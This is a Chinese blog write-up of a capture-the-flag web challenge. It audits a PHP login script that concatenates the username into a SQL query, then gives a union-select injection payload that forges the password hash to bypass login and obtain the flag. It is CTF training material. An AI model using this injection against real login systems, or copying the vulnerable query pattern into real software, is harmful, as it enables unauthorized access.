西普实验吧ctf-web-程序逻辑问题(代码审计)

最新推荐文章于 2022-01-06 20:26:57 发布
最新推荐文章于 2022-01-06 20:26:57 发布
阅读量446 收藏
点赞数
分类专栏: # ——【 Code Audit】 ★ CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/85292267
版权

题目地址:http://ctf5.shiyanbar.com/web/5/index.php

 查看页面源代码,发现index.txt隐藏文件

 又是一道代码审计的题目:

if($_POST[user] && $_POST[pass]) {
	$conn = mysql_connect("********, "*****", "********");
	mysql_select_db("phpformysql") or die("Could not select database");
	if ($conn->connect_error) {
		die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
	printf("Error: %s\n", mysql_error($conn));
	exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  
  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
	echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");
	
  }
}

看完后,我们大概能得到两个结论:

  1. 要获取user的那一行数据。
  2. 把user那一行数据的pw列,经过md5加密后,与提交的pass数据做比较,相等就输出flag。

payload:

http://ctf5.shiyanbar.com/web/5/index.php
[POST]user=Username' union select md5(111)#&pass=111

这样就得到flag了。

烟敛寒林o
关注
专栏目录
实验web题--代码审计
yisosooo的博客
09-06 1750
1、因缺思汀的绕过
西普部分CTF题目(web)(持续更新)
技术学习人生
08-16 9273
1、菊花 题目地址:http://www.simplexue.com/ctf/examctfdetail/729 点击“我是吊死”进入sim.php页面,post参数为id=,提示需要net framework 9.9 用burp拦截,修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9),下面的注入均在这个条件下进行 id=1 提示hacker:w
实验吧-程序逻辑问题
欢迎光临
12-18 349
&lt;?php if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) // 只能包含字母或者数字开头 { echo '&lt;p&gt;You password must be alphanumeric&lt;/p&gt;'; } else ...
实验吧-web-程序逻辑问题
a3uRa的一个窝
08-29 394
源代码index.txt 发现源码 &amp;lt;html&amp;gt; &amp;lt;head&amp;gt; welcome to simplexue &amp;lt;/head&amp;gt; &amp;lt;body&amp;gt; &amp;lt;?php if($_POST[user] &amp;amp;&amp;amp; $_POST[pass]) { $conn = mysql_conn
中国民航大学第四届“西普杯”信息安全竞赛-题目源程序和Writeup.zip
最新发布
10-23
中国民航大学第四届“西普杯”信息安全竞赛-题目源程序和Writeup.zip
西普WEB大部分题解
12-09
【标题】"西普WEB大部分题解"是一个针对网络安全领域中的Web安全训练平台——西普CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
siwikode:高级 Web 编程最终项目 - SIWIKODE 应用程序
07-24
德波市信息系统应用程序提供有关德波市领先的烹饪和休闲旅游的各种信息 由学生开发 Nurul Fikri 的集成 STT :sparkles: 2 信息技术 8 :sparkles: 环境 下载 [DBSIWIKODE MYSQL] : Setting database configuration ...
实验CTF逆向题目easycreakme题解
iqiqiya的博客
12-24 3441
实验吧看到这道题 题目链接 http://ctf5.shiyanbar.com/reverse/easycreakme/Easy_CrackMe.exe.bak   我是直接用的脱壳后的 https://pan.baidu.com/s/1qYLZaXm      IDA载入很清楚的可以发现先后与a,5y,R3versing,E进行比较 若都
Web逻辑漏洞挖掘快速入门到放弃
02-20
Web逻辑漏洞挖掘 身份认证安全、业务一致性安全、业务数据篡改、密码找回等各种漏洞案例。
决斗场 - 实验WEB 程序逻辑问题
RaAlGhul的博客
12-21 632
题目链接:http://www.shiyanbar.com/ctf/62 点开题目链接,发现是一个类似于登陆的界面: 首先以之前的一道题:登陆一下好吗??的思路,猜测后台代码为: select * from user where username='str' and password='pastr' 我们在username和password上都输入 a'='
实验吧-程序逻辑问题writeup
一个安全研究员
08-27 9503
1.      程序逻辑问题   题目提示是程序逻辑问题,那一定涉及到源码审计嘛,F12查看网页源代码:       这儿不就藏着源码吗,构造URL访问index.txt的如下源码: &lt;html&gt; &lt;head&gt; welcome to simplexue &lt;/head&gt; &lt;body&gt; &lt;?php     if($_P...
Web安全-逻辑错误漏洞
道阻且长,行则将至。
02-06 1973
概述 挖掘逻辑漏洞 绕过授权验证 密码找回漏洞 支付逻辑漏洞 指定账户恶意攻击
从0到1CTFer成长之路-第三章-逻辑漏洞
黑白的博客
03-18 1642
声明 好好向大佬们学习!!! 攻击 逻辑漏洞 摘自 https://book.nu1l.com/tasks/#/ 使用BUUCTF在线环境 https://buuoj.cn/challenges 访问 http://3e95fcac-6f75-4037-82c4-b13e38bb3220.node3.buuoj.cn 是个炫酷的登录页面,本来还以为是通过任意用户注册,或者Session等,谁知道直接点提交,就能登进去买书 点击提交后,看到了买书的页面 映入眼帘的三本书 第一本flag,2000块
ctf-web:文件包含漏洞和举例-HCTF2018 WarmUp
热门推荐
薯片薯条的博客
10-15 8万+
我又回来更新了,这次是关于web方面的文件包含漏洞.我会在后面以详细的角度来写清楚这个漏洞的利用方法. 当然,以下都是我自己的理解,表述什么的都有些野人化了.所以希望各位大佬手下留情. 一.漏洞产生的原因 这个漏洞可以追溯到很久.更准确来说,其实是人为产生的.由于我php学的不是很专业,所以我就拿c语言来举例了.php里面使用的是include命令,c语言使用的是#include预处理命令.作用是相似的. 我新建了两个文件,内容如图. wzc.h: #include "stdio.h" void pri.
22.WEB漏洞-文件上传之内容逻辑数组绕过与解析漏洞
mingyqf的博客
01-06 528
知识点 文件头检测 图像文件信息判断 逻辑安全-二次渲染 逻辑安全-条件竞争 目录命名-x.php/. 脚本函数漏洞-CVE-2015-2348 数组接受+目录命名 本课重点: Uploadlabs-pass13-20关卡测试 案例1:Pass-13 文件头检测 图片马绕过 案例2:Pass-14 getimagesize()图像文件信息判断 图片马绕过 案例3:Pass-15 exif_imagetype()图像文件信息判断 图片马绕过 案例4:Pass-16 二次渲染绕过 案例5:Pass-17
php post验证输入,PHP简单post验证绕过
weixin_39938746的博客
03-10 785
if($_POST[user] && $_POST[pass]) {$conn = mysql_connect("*******", "****", "****");mysql_select_db("****") or die("Could not select database");if ($conn->connect_error) {die("Connection fai...
CG CTF WEB SQL注入2
无限迭代中......
07-04 1489
http://4.chinalover.sinaapp.com/web6/index.php 题解: <html> <head> Secure Web Login II </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE...
西普STR系列C型软启动器与S7-226PLC MODBUS通讯详解
西安西普电力电子有限公司提供了详细的通讯说明书,指导用户如何配置和使用STRC软启动器与S7-226PLC进行Modbus通讯,包括硬件连接、协议设置以及可能遇到的问题解决方法。这份说明书不仅包含了理论知识,还有实用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值